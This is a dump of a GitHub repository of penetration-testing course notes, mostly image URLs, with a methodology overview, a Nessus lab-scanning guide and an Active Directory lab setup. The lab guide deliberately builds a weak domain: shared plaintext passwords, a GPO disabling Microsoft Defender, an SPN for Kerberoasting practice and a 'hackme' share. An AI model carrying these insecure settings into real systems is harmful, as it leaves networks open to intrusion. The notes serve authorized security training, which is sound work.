https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_08-06-15_591.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_08-09-04_592.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_08-09-04_592.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_08-11-16_593.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_08-11-16_593.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_08-35-23_594.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_08-35-23_594.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_09-10-36_595.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_09-10-36_595.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_20-40-27_596.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-40-27_596.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_20-41-43_597.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-41-43_597.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-16_599.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-16_599.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-48_600.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_20-44-48_600.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_09-03-53_601.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_09-03-53_601.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_09-10-10_602.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_09-10-10_602.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_09-24-35_603.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_09-24-35_603.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_09-53-02_604.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_09-53-02_604.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_10-10-23_605.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_10-10-23_605.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_10-10-38_606.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_10-10-38_606.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_10-20-20_607.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_10-20-20_607.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_23-40-18_609.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_23-40-18_609.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_23-49-55_610.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_23-49-55_610.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-13_23-52-14_611.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-13_23-52-14_611.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_11-24-27_612.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_11-24-27_612.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_11-42-54_613.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_11-42-54_613.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_11-51-24_614.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_11-51-24_614.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_12-01-59_615.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_12-01-59_615.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_12-07-27_617.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_12-07-27_617.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_12-14-47_620.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_12-14-47_620.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_12-15-03_621.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_12-15-03_621.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_12-35-27_623.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_12-35-27_623.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_12-37-24_624.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_12-37-24_624.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_12-48-12_626.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_12-48-12_626.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_18-49-15_627.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_18-49-15_627.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_18-55-25_628.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_18-55-25_628.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-07-03_629.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-07-03_629.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-16-46_630.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-16-46_630.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-24-12_631.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-24-12_631.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-29-26_632.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-29-26_632.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-31-18_633.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-31-18_633.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-38-26_634.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-38-26_634.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-43-46_635.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-43-46_635.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-14_19-53-41_637.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-14_19-53-41_637.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/Netcat-bind-shell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/Netcat-bind-shell.jpg -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/Netcat-reverse-shell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/Netcat-reverse-shell.jpg -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/Phases-of-Ethical-Hacking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/Phases-of-Ethical-Hacking.png -------------------------------------------------------------------------------- /peh/3-eth-hack/README.md: -------------------------------------------------------------------------------- 1 | # 3. The Ethical Hacker Methodology 2 | 3 | ![Phases of Ethical Hacking - InfosecTrain](.gitbook/assets/Phases-of-Ethical-Hacking.png) 4 | 5 | ➡️ **Ethical hacking**, or **penetration testing**, identifies and addresses vulnerabilities in computer systems and networks through a structured process. 6 | 7 | The five stages are: 8 | 9 | 1. **Reconnaissance**: Gathering information about the target using passive techniques like public searches, website browsing and DNS examination to understand the target and find potential entry points. 10 | 2. **Scanning**: Actively probing the target to discover open ports, services and vulnerabilities using tools like port scanners, network mappers and vulnerability scanners to identify exploitable weaknesses. 11 | 3. **Gaining Access**: Exploiting discovered vulnerabilities to gain unauthorized access using methods like password cracking, social engineering and software exploits. 12 | 4. **Maintaining Access**: Ensuring continued access by bypassing security, setting up backdoors and establishing persistent access to mimic a real attacker and assess potential impact. 13 | 5. **Covering Tracks**: Removing traces of activity by deleting logs, modifying files and restoring the system to its original state to remain undetected and to leave no evidence. 14 | 15 | > Ethical hacking must always be **authorized**, legal and conducted with strict adherence to **ethical guidelines**, **confidentiality** and necessary **permissions** from system owners. 16 | > 17 | > ❗ **Use these techniques responsibly, ethically and with proper authorization for security testing!** 18 | 19 | --- 20 | 21 | ## Sections 22 | 23 | 1. [Information Gathering](recon.md) 24 | 1. [Scanning & Enumeration](enum.md) 25 | 1. [Vulnerability Scanning with Nessus](va.md) 26 | 1. [Exploitation Basics](exploit.md) 27 | 1. [Capstone Practical Labs](capstone.md) 28 | 29 | ------ 30 | 31 | -------------------------------------------------------------------------------- /peh/3-eth-hack/va.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Scanning with Nessus 2 | 3 | ## Nessus 4 | 5 | ➡️ [Nessus](https://www.tenable.com/products/nessus/nessus-essentials) 6 | 7 | - [Download Nessus](https://www.tenable.com/downloads/nessus) 8 | 9 | ```bash 10 | curl --request GET --url 'https://www.tenable.com/downloads/api/v2/pages/nessus/files/Nessus-10.7.4-ubuntu1404_amd64.deb' --output 'Nessus-10.7.4-ubuntu1404_amd64.deb' 11 | 12 | sudo dpkg -i Nessus-10.7.4-ubuntu1404_amd64.deb 13 | 14 | sudo systemctl start nessusd.service 15 | ``` 16 | 17 | - Open the browser and go to [https://localhost:8834](https://localhost:8834) 18 | - Follow my guide here to configure Nessus - [Nessus Essentials - syselement](https://blog.syselement.com/home/operating-systems/linux/tools/nessus) 19 | 20 | - Set a new scan with 21 | - Kioptrix VM IP - `192.168.31.130` 22 | - Discovery - `Port scan (all ports)` 23 | - Assessment - `Scan for known web vulnerabilities` 24 | - Advanced settings if necessary 25 | 26 | ![](.gitbook/assets/2024-07-11_20-44-16_599.png) 27 | 28 | ![](.gitbook/assets/2024-07-11_20-44-48_600.png) 29 | 30 | --- 31 | 32 | -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-15_23-41-00_638.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-15_23-41-00_638.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-28_21-48-50_660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-28_21-48-50_660.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-28_21-59-11_661.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-28_21-59-11_661.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_17-11-00_662.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_17-11-00_662.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_17-19-49_663.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_17-19-49_663.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_17-25-15_664.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_17-25-15_664.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_17-30-47_665.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_17-30-47_665.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_17-36-56_666.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_17-36-56_666.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_17-56-07_667.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_17-56-07_667.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_17-59-35_668.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_17-59-35_668.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-07-29_18-03-18_669.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-07-29_18-03-18_669.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-13_22-35-29_679.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-13_22-35-29_679.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-13_22-39-43_680.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-13_22-39-43_680.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-13_23-25-28_682.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-13_23-25-28_682.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-15_18-16-02_684.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-15_18-16-02_684.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-15_18-18-01_685.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-15_18-18-01_685.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-15_18-50-35_686.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-15_18-50-35_686.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-15_18-55-48_687.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-15_18-55-48_687.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-15_18-58-57_688.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-15_18-58-57_688.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-15_19-00-45_689.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-15_19-00-45_689.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-15_19-01-39_690.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-15_19-01-39_690.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-16_09-18-13_685.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-16_09-18-13_685.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-16_09-21-21_686.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-16_09-21-21_686.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-16_09-26-19_687.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-16_09-26-19_687.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2024-08-16_09-44-46_688.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2024-08-16_09-44-46_688.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2025-02-15_09-35-18_881.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2025-02-15_09-35-18_881.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2025-02-15_10-30-03_883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2025-02-15_10-30-03_883.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2025-02-15_19-47-13_885.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2025-02-15_19-47-13_885.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2025-02-15_20-28-56_886.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2025-02-15_20-28-56_886.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/2025-02-16_10-42-02_887.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/2025-02-16_10-42-02_887.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/ad-org.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/ad-org.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/ad.png -------------------------------------------------------------------------------- /peh/4-active-directory/.gitbook/assets/llmnr-overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/4-active-directory/.gitbook/assets/llmnr-overview.png -------------------------------------------------------------------------------- /peh/4-active-directory/1-ad-lab.md: -------------------------------------------------------------------------------- 1 | # Active Directory Lab 2 | 3 | > **Lab Requirements** 4 | > 5 | > - 1 Windows Server 6 | > - 2 Windows 10 Workstations 7 | > - 60 GB Disk space 8 | > - 16 GB RAM 9 | 10 | - Proceed with installing a Windows Server 2022 VM and two Windows 10 VMs inside VMware 11 | - For each of them install the VMware tools 12 | 13 | --- 14 | 15 | ## Windows Server 2022 16 | 17 | 🔗 [Win Server 2022 Evaluation iso - direct link](https://software-static.download.prss.microsoft.com/sg/download/888969d5-f34g-4e03-ac9d-1f9786c66749/SERVER_EVAL_x64FRE_en-us.iso) 18 | 19 | - Hostname - `HYDRA-DC` 20 | - User (domain admin) - `administrator`:`P@$$w0rd!` 21 | - **IP** - set a static IP 22 | - `Control Panel\Network and Internet\Network Connections` 23 | - IPv4 IP - `192.168.31.90` (in my lab) 24 | - Add the following server roles 25 | - Active Directory Domain Services 26 | - Active Directory Certificate Services 27 | - Domain - `MARVEL.local` 28 | - **Active Directory Users and Computers** 29 | - Copy the `Administrator` user and create a second domain admin 30 | - `tstark`:`` 31 | - Copy the `Administrator` user and create a service account 32 | - `SQLService`:`MYpassword123#` 33 | - Create new users 34 | - `fcastle`:`Password1` 35 | - `pparker`:`Password1` 36 | 37 | - **File and Storage Services** 38 | - Create a new SMB Share Quick - `hackme` 39 | 40 | - **Group Policy Management** 41 | - Create a new Enforced GPO - `Disable Windows Defender` 42 | - Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Microsoft Defender Antivirus - Enable `Turn off Microsoft Defender Antivirus` 43 | 44 | - **SPN** - Register the Service Principal Name - SQLService 45 | 46 | ```bash 47 | setspn -a HYDRA-DC/SQLService.MARVEL.local:60111 MARVEL\SQLService 48 | 49 | # Query for SPN 50 | setspn -T MARVEL.local -Q */* 51 | ``` 52 | 53 | ![](.gitbook/assets/2024-07-15_23-41-00_638.png) 54 | 55 | - Open `Powershell` as admin and set timezone 56 | 57 | ```bash 58 | Set-TimeZone "W. Europe Standard Time" 59 | ``` 60 | 61 | --- 62 | 63 | ## Windows 10 64 | 65 | 🔗 [Windows 10 Enterprise iso](https://www.microsoft.com/en-us/evalcenter/download-windows-10-enterprise) 66 | 67 | - Hostname1 - `THEPUNISHER` 68 | - User - `frankcastle`:`Password1` 69 | - Hostname2 - `SPIDERMAN` 70 | - User - `peterparker`:`Password1` 71 | - **IP** - set the DNS to the DC IP - `192.168.31.90` 72 | - Join both VMs to the `MARVEL.local` domain 73 | - Login using `MARVEL\administrator`:`P@$$w0rd!` 74 | - `Edit local users and groups` 75 | - Reset password and enable local `Administrator`:`Password1!` 76 | 77 | - Add the domain users to the Administrators group 78 | - `fcastle` for `THEPUNISHER` VM 79 | - `fcastle` and `pparker` for `SPIDERMAN` VM 80 | 81 | - Go to Network and turn on `Network discovery and file sharing` 82 | 83 | 84 | 85 | `SPIDERMAN` - Logoff and login locally to `.\peterparker`:`Password1` 86 | 87 | - **Map Network Drive** - `\\HYDRA-DC\hackme` , reconnect at sign-in, using different credentials 88 | 89 | --- 90 | 91 | | VM | IP | 92 | | ------------------------ | ------------- | 93 | | hydra-dc.MARVEL.local | 192.168.31.90 | 94 | | spiderman.MARVEL.local | 192.168.31.92 | 95 | | thepunisher.MARVEL.local | 192.168.31.93 | 